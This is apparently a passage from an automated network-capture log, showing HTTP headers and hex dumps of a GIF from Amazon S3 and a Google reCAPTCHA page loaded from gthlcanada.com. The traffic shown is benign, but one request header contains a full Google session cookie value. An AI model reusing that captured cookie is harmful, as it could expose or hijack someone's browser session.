                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/gif
                                                                                                                          Content-Length: 114750
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Last-Modified: Thu, 14 Nov 2024 00:56:52 GMT
                                                                                                                          ETag: "4028a902fd738bcbff571168cac7cc91"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 13af704549c5ac5d9fb78e3b737019ec.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: VmiqtUxF0NmerIu77OTBbKnCi63pQzz2hp4Dw9TNn_RszE0KvvPHXg==
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 47 49 46 38 39 61 2c 01 fa 00 f7 ff 00 ff ff ff 9d 0c cd 00 00 f4 9f 11 e0 cb 90 71 af 11 ec 8d 0d de 89 07 b6 ac 20 22 c2 11 d3 fc d0 b0 50 68 ae d8 1b cf cc 10 7b ea 1b be 61 2d 54 e8 1b 9a b1 67 dc 07 20 4f b1 11 df ee 1b ae ea 1e cf 50 4c 4c 3a 10 11 55 0e 11 d8 1b be 71 6c 6c dc b6 d1 11 29 59 b2 11 cf b4 11 b1 0f 0c 0c 79 44 6d d0 d8 f6 6e 44 30 7c 07 d2 f7 24 be 01 01 01 00 6b b1 11 11 1c e1 cc d9 c4 90 b5 4f 34 27 c5 11 be 79 b3 d9 e6 ae 8b a8 cd e8 a3 67 93 93 8c 89 f2 d7 ef 76 52 48 da 1b b0 7d 07 db ae 0c 9d c3 2b 2c db 11 8b 1c 82 c0 68 66 fa 20 1c 1c fc 24 ce b7 b1 ae e7 11 37 85 11 1e 9d 69 50 9d 0b ae e7 11 97 4b 97 cd e7 5a be c8 11 9c e6 72 cf d8 1b dc 0c 0d 34 ca 1a cd 8b 1c 1c e8 97 d7 cf be b6 a4 11 c2 fc d9 cd 27 8e c9 8d 7c 72 87 07
                                                                                                                          Data Ascii: GIF89a,q "Ph{a-Tg OPLL:Uqll)YyDmnD0|$kO4'ygvRH}+,hf $7iPKZr4'|r
                                                                                                                          2025-01-13 21:01:18 UTC595INData Raw: 6c 42 b1 80 01 0c a0 c1 3a c0 eb ba ee ac ce f6 ec cb f2 ec cf fa 2c cc 0e 2d d0 12 6d cf 7e 01 11 20 2a d2 2a 6d d2 36 6a d3 2e ad d3 32 ad d4 46 6d 40 c6 5a 55 16 cf ef a8 4b 59 c4 5a f1 80 99 3b b0 9d 38 76 01 18 08 4e 94 e6 ea f8 54 95 29 41 5b 46 2e 81 c2 1a 23 db c2 21 0a 34 6c 0c 34 6c 98 6a 55 2a c9 00 1c 30 88 0e 3c 81 3c fc 40 ae c8 43 1d 1c 03 d3 fa 08 4a 10 47 0d fe 4f 8f 84 a5 b8 8d 45 48 61 00 6e 28 92 76 41 ad e4 3e ed d3 fa 80 4d 10 a1 30 58 c6 7a 4e ee d4 72 6e d4 7e ff ae e7 86 2e e5 76 ee e8 82 6e e9 8a 6e e7 0a 6d d1 ae 2e bc 1e e4 6b 7e 4d 02 66 a5 50 a1 c5 48 d9 eb 41 e2 64 92 74 c1 39 6c 42 a5 c8 dd 84 f5 81 29 0d 14 b5 35 a8 9f c5 a1 47 ba ea 97 ce 61 c2 c2 a1 ab 4e 2c 01 3c a7 61 e8 00 a6 a8 40 1f e4 0a 11 b5 eb 05 e8 00 4a 08 53
                                                                                                                          Data Ascii: lB:,-m~ **m6j.2Fm@ZUKYZ;8vNT)A[F.#!4l4ljU*0<<@CJGOEHan(vA>M0XzNrn~.vnnm.k~MfPHAdt9lB)5GaN,<a@JS
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 9b 74 04 e6 80 25 03 f7 b2 22 a9 90 59 c8 84 4a b4 dd 03 2c 00 c2 6c 02 d9 ee 0d f1 aa 6a 98 4e db 16 ac e5 db 72 e9 e0 0d d4 93 52 82 de 58 00 fa 7c aa 2c cd 92 0e 40 d0 40 34 0a 42 e8 c2 2d d1 32 e1 d2 30 22 72 ea ed d9 c0 ae d8 e0 e6 84 ff 63 8e 61 00 5e fd b0 17 e4 b2 3e db f2 27 d0 51 d3 25 c3 26 58 c3 3e d7 32 16 eb f2 40 1b 34 42 1f b4 42 27 74 42 c7 b2 43 bf f2 16 13 81 58 d0 ae ef 9c f1 ef 5c da 9b f8 b0 d6 88 8d 4c e4 e0 b0 2a 82 f4 3e b3 fa 58 69 9e 6d 55 57 11 00 0c 70 70 72 2e c1 57 95 88 0e a8 00 64 d4 cd 19 3c 46 74 8a 01 22 97 15 1c a4 98 0e b8 5d 17 5b 83 44 9d 44 4e db a9 aa 30 e2 23 ae 1b 08 30 87 37 be c9 62 a6 05 90 01 59 33 40 34 28 5b 83 4d 00 e5 60 c9 c2 ae 3d f4 d0 ea 2f 69 11 c1 56 77 b5 56 7f 35 ff 7a 75 58 bf 2b 54 97 75 28 73
                                                                                                                          Data Ascii: t%"YJ,ljNrRX|,@@4B-20"rca^>'Q%&X>2@4BB'tBCX\L*>XimUWppr.Wd<Ft"][DDN0#07bY3@4([M`=/iVwV5zuX+Tu(s
                                                                                                                          2025-01-13 21:01:18 UTC12792INData Raw: 91 35 f6 0e d1 92 67 65 b4 6f 2a f1 0b 87 f7 94 43 19 95 50 e9 80 d9 08 6d 06 d1 86 53 29 95 5a 59 05 60 37 78 14 b1 06 9a c2 5e 72 d0 7a 04 81 0d fa 70 08 30 20 06 2a 60 01 67 b0 04 12 98 64 3f f9 40 ab 38 3b 1d b9 7c 5d 18 94 52 37 92 04 11 02 75 d9 97 7e d9 97 40 48 90 48 a8 81 7f 59 98 7d 99 02 9c d3 7c 05 c1 03 1f 00 06 f3 20 06 27 00 06 9b f0 04 79 f5 87 2c 18 81 5c a1 89 7b c8 79 43 99 2e 8a 69 72 98 49 64 59 39 9a 5a b9 3e 82 a9 68 72 48 9a aa 19 95 65 f8 6b a9 a1 09 28 c0 03 8b 40 0b 4b b0 04 fa f0 52 02 61 01 1f d0 98 c2 e0 0b e7 b0 9b 70 a0 01 6e a9 53 f6 77 99 e0 56 15 9f 69 5f 7c f0 97 0d 91 9c ae 39 8f ff a0 7c 86 39 9d 6f 77 9a 09 d5 86 d3 99 9d cb 87 9b 5e e9 18 fa 00 03 16 20 0b 8d ff b9 09 62 b0 09 3a 00 06 60 60 01 c2 09 03 3a a0 03 1f
                                                                                                                          Data Ascii: 5geo*CPmS)ZY`7x^rzp0 *`gd?@8;|]R7u~@HHY}| 'y,\{yC.irIdY9Z>hrHek(@KRapnSwVi_|9|9ow^ b:``:
                                                                                                                          2025-01-13 21:01:18 UTC6396INData Raw: c1 c0 28 6c 80 94 97 03 88 2a f6 2e bf 38 96 cb 38 c5 8e 84 96 67 79 8b 13 c1 c0 0c f3 57 b4 94 ad 62 f6 00 9b a2 e3 06 a5 0c 4c f3 34 9b d4 ae 2d 26 e6 26 03 0a 64 b3 5c 9c 14 c0 04 e3 a1 a0 64 98 f3 90 b9 f0 15 81 39 08 33 a6 99 6c 03 2d 84 e0 cf b4 1e a8 06 fb b6 2c 21 d9 26 d4 25 0f e1 2e f7 69 47 09 20 29 bb 70 f5 8a bf 37 a6 ff 73 39 f0 9b 16 a4 80 16 bc 00 08 3c 00 f6 ec 21 d6 bd 4a 8a 59 60 56 fc c0 0b d4 01 35 40 44 a7 2f c1 3f 7c 1d 01 44 f9 06 a0 c0 06 a4 00 da 35 f7 40 8f 84 ae ab 30 08 0c cc 55 ab ac 06 1c 02 4b ff 04 5e c9 b4 e3 02 40 36 b7 ec 49 bd d4 13 fc 83 66 0e 63 14 2e c5 13 ec cd ae 85 b9 b1 12 c0 b2 b6 c7 9f 84 1f f6 f0 15 ea da 05 18 da e4 b5 61 f8 b6 9e 7b 5f f0 95 de 6d 82 50 94 9f d3 ee 20 bb 6b ff d7 82 dc 95 26 80 e3 8a 83 2a
                                                                                                                          Data Ascii: (l*.88gyWbL4-&&d\d93l-,!&%.iG )p7s9<!JY`V5@D/?|D5@0UK^@6Ifc.a{_mP k&*
                                                                                                                          2025-01-13 21:01:18 UTC6396INData Raw: 28 48 92 82 29 ec f1 4a 56 0f 68 20 d3 6e 16 d0 a4 01 34 ca ad c8 e2 8a 26 c4 f2 44 53 2c 0a 22 4c 09 f3 e8 a3 09 0f 30 64 03 dc 1e 0f 64 42 9e 05 7d 59 84 11 42 17 29 d8 51 78 96 68 74 5a 65 2f c0 d0 19 61 ea 55 37 e4 5f 05 c9 e6 51 61 8a 2c a9 d8 7d 8c dd e7 d8 83 09 a2 c0 5f 0a 31 10 36 ca 16 03 a6 f5 82 05 99 4c b6 81 45 1b 19 74 9a 84 56 3e 68 89 9d f5 a5 d5 d1 06 28 0c d1 86 17 6f 78 d1 46 56 16 c0 40 e2 6e 34 e1 e4 44 8b 8e 3e 1a 54 a3 95 38 1a 46 14 52 51 65 15 08 59 b5 91 82 05 3f 56 17 21 91 24 1a a9 e0 62 0c 0d 79 da 69 8a 54 82 d9 13 a6 41 84 90 05 19 2d a9 51 87 a3 04 56 d1 58 ab bd e7 a5 60 bd fa aa 45 5a fc a5 15 d1 06 10 82 36 18 41 68 59 24 db 6b a7 95 53 65 62 0b 1d a6 18 92 68 99 44 a8 17 44 64 0b 1c 1a 4f 58 20 46 ff 4c 16 40 4a 6e b9
                                                                                                                          Data Ascii: (H)JVh n4&DS,"L0ddB}YB)QxhtZe/aU7_Qa,}_16LEtV>h(oxFV@n4D>T8FRQeY?V!$byiTA-QVX`EZ6AhY$kSebhDDdOX FL@Jn
                                                                                                                          2025-01-13 21:01:18 UTC6396INData Raw: 8e 35 61 6a 4f 12 57 6c 86 06 15 50 28 45 35 90 ac 64 26 2f 39 c9 4f 6e 32 94 9d 4c e5 29 5b 59 ca a5 28 48 95 b1 1c e5 2e 6f d9 cb 57 06 33 97 bf 4c 66 28 84 84 cb 64 e3 13 48 0d 12 66 27 9f 73 ff 20 8b f8 01 01 f4 d0 04 3d fc 40 04 32 a8 43 0b 14 a0 80 17 73 b9 2c 21 18 f3 94 8d 3c c9 13 9b 98 c4 86 7e e0 d5 4a cc e8 44 3b 9a c4 22 61 a0 37 94 35 64 e6 82 24 7a 89 05 e3 4b 7f a0 67 3d 28 c0 ce f2 90 33 9f 9b 90 82 69 0a f8 24 5c 20 31 a1 01 b0 5c 25 97 62 15 ae 86 75 35 5e 1d eb 5a cf 5a d6 b4 be b5 ad b3 2c 90 5c fb 1a d7 c0 de 75 b0 75 4d ec 5f 0b fb d8 ba d6 2f a5 42 55 29 4c 79 2a 06 c6 c4 65 33 3d 53 6c 5c 57 75 b0 4b e8 c3 16 5a d0 84 4f df f9 07 9e c6 82 02 b6 b0 8b 2b cc 7a d6 2f eb 9a b1 75 bd ea 8f 91 f4 d5 0b 84 37 ac df 4d ef 78 d7 7b de 64
                                                                                                                          Data Ascii: 5ajOWlP(E5d&/9On2L)[Y(H.oW3Lf(dHf's =@2Cs,!<~JD;"a75d$zKg=(3i$\ 1\%bu5^ZZ,\uuM_/BU)Ly*e3=Sl\WuKZO+z/u7Mx{d
                                                                                                                          2025-01-13 21:01:18 UTC6396INData Raw: 75 c4 3c 49 13 04 5d 58 8f 21 b9 a5 34 9a 11 11 00 35 2a 24 14 2a 43 3d 8b d1 37 42 11 30 d9 7b 86 65 19 14 ad 19 9d ad e9 2d 3d 40 84 8a 09 22 45 7a a9 2a 59 3e 3c 94 12 00 42 46 e4 83 bb 37 7b 24 b9 01 97 ff e5 5b 99 75 20 47 8e 5c c7 cb b3 ae f5 9b 02 14 d0 33 cf 2a bf 90 3c 49 94 dc 2c 74 fc a4 4e 40 49 97 7c 49 98 74 49 f9 53 84 86 70 8e d6 da 04 f3 e8 0e c8 98 23 1e a1 a1 3c 12 30 ac f3 47 58 14 30 d0 d1 a5 25 1b ab f1 11 9d 7c db 1a 43 09 35 05 b8 02 45 0a 41 70 c9 9d d7 58 0d c1 e2 a6 b9 f9 07 29 01 be bf fa bd 97 ca a6 d7 98 19 1d c0 0f 50 e8 1d 6d f2 1d 4a 02 82 98 5c 4b b6 6c 4b 19 04 c9 c4 9b 82 ed 93 31 44 9b cb b8 bc 4b f1 ca 3e f1 6a 38 9a 5b 49 00 a8 36 bd 5c bf bc c4 4b c1 2c cc c0 3c cc bb 9c 82 45 d1 05 19 80 83 33 d0 85 82 4a a1 78 cb
                                                                                                                          Data Ascii: u<I]X!45*$*C=7B0{e-=@"Ez*Y><BF7{$[u G\3*<I,tN@I|ItISp#<0GX0%|C5EApX)PmJ\KlK1DK>j8[I6\K,<E3Jx
                                                                                                                          2025-01-13 21:01:18 UTC12792INData Raw: 40 03 3e ec c3 3f 50 41 39 24 83 2a fd 83 ca 2e eb 3f 44 83 20 68 ab cc fe ad a7 3e aa e0 d6 2c e1 96 ab 6d dd 27 62 c0 25 cf 6e 44 27 18 e8 6d 2a 41 38 f4 a7 94 fe 25 83 d6 a0 17 cc 2b 11 fc 43 d3 aa 9a 0d 71 a0 60 c1 ff 80 06 6c 81 06 f4 1c 77 be e1 3f 28 82 06 c0 c0 0b cc ea 24 1c ec 2e e2 80 10 2c 20 c9 e2 80 06 24 a4 43 5e 85 9b ae ad 9d a2 e8 30 d4 89 6f ac a0 09 6a e7 e6 10 20 01 3e 20 34 38 01 33 14 44 f2 de 6d 42 a4 01 0e 14 c4 25 5c 01 e0 3e ea bc b6 5f f5 5e ae e5 5e af f6 66 6f 23 c8 97 8f 78 c7 ce 2e ee 46 34 41 94 1e 68 80 12 42 d0 1a a8 3a 66 6a b6 79 c1 df b6 41 18 bc 84 d3 36 2d 07 3e 81 41 2d 67 e8 d6 81 18 a8 41 3f a2 9c d7 32 e0 2e 0a 41 30 fc 2f 0e bc ee 00 0f 6c 30 d8 03 34 00 ab da 56 25 8c 36 b0 09 5a a4 da ce 69 2c d8 03 f3 66 86
                                                                                                                          Data Ascii: @>?PA9$*.?D h>,m'b%nD'm*A8%+Cq`lw?($., $C^0oj > 483DmB%\>_^^fo#x.F4AhB:fjyA6->A-gA?2.A0/l04V%6Zi,f
                                                                                                                          2025-01-13 21:01:18 UTC12792INData Raw: 0e ef 6c 92 88 a8 f2 86 62 4f 12 a3 78 39 0a 28 a1 a6 82 69 0e 54 9a 9a ff c8 27 af 66 8b 08 95 88 d0 8a e9 3f 4a 79 f9 ea a9 00 22 ea 20 00 e6 6e 3b c8 4b 57 bc 14 2e d1 50 b4 c1 41 b4 be ac c0 07 87 1f e7 62 a1 33 2a 3a 7c 06 44 c2 1e 50 e3 89 25 92 59 40 8c c6 4e 58 4c 8d c7 60 5c 43 9f 43 2c 13 62 9f 0c 59 4b 55 9b 5e 5c f0 11 47 57 0f 11 c2 09 39 58 c0 87 33 6d 00 6b 47 1b 65 0c 0a c0 b6 01 32 65 82 ac 52 ba ec 46 39 74 9d 5b 25 21 57 ba 21 ce cb 73 d5 15 6e 5e 2f 9d 73 ee 24 db 10 ed ee bb 45 b1 5b 28 53 83 12 cd 2a 5c af 02 b0 49 ad 88 ca 8a c8 3b 8a d8 d4 e9 3c 3f ff 5b 8f 3d 8a 27 a6 94 b6 83 56 32 68 2b b5 ce 33 74 2d f2 ac 9a d2 28 4a 6d 82 b2 ab ef a6 d3 b8 14 2b ab 41 85 b7 6e e8 b9 a4 17 39 38 49 25 47 6a f1 39 a4 da 32 2a dc 90 8a 1e 67 ed
                                                                                                                          Data Ascii: lbOx9(iT'f?Jy" n;KW.PAb3*:|DP%Y@NXL`\CC,bYKU^\GW9X3mkGe2eRF9t[%!W!sn^/s$E[(S*\I;<?[='V2h+3t-(Jm+An98I%Gj92*g


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          87192.168.11.2049904142.251.111.1054431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC1126OUTGET /recaptcha/api2/anchor?ar=1&k=6LfHrSkUAAAAAPnKk5cT6JuKlKPzbwyTYuO8--Vr&co=aHR0cHM6Ly9ndGhsY2FuYWRhLmNvbTo0NDM.&hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&size=invisible&cb=s7x76yuho1vi HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wB
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                          2025-01-13 21:01:19 UTC1161INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                          Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-lA2r_KpAQIck329EA1TWxg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2025-01-13 21:01:19 UTC94INData Raw: 35 37 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                          Data Ascii: 57e0<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63
                                                                                                                          Data Ascii: text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cyrillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 57 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 20 55 2b 30 31 31 30 2d 30 31 31 31 2c 20 55 2b 30 31 32 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d 30 33 30 39 2c 20 55 2b 30 33 32 33 2c 20 55 2b 30 33 32 39 2c 20 55
                                                                                                                          Data Ascii: eight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7WxKOzY.woff2) format('woff2'); unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 41 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 41 42 63 34 45 73 41 2e 77 6f 66 66
                                                                                                                          Data Ascii: e-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 68 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 42 41 2c 20 55 2b 30 32 42 44 2d 30 32 43 35 2c 20 55 2b 30 32 43 37 2d 30 32 43 43 2c 20 55 2b 30 32 43 45 2d 30 32 44 37 2c 20 55 2b 30 32 44 44 2d 30 32 46 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55
                                                                                                                          Data Ascii: family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2) format('woff2'); unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 30 2d 30 34 35 46 2c 20 55 2b 30 34 39 30 2d 30 34 39 31 2c 20 55 2b 30 34 42 30 2d 30 34 42 31 2c 20 55 2b 32 31 31 36 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b
                                                                                                                          Data Ascii: 0-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* greek-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfCBc4EsA.woff2) format('woff2'); unicode-range: U+
                                                                                                                          2025-01-13 21:01:19 UTC1255INData Raw: 32 30 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 30 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 42 42 63 34 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e
                                                                                                                          Data Ascii: 20, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc4.woff2) format('woff2'); un
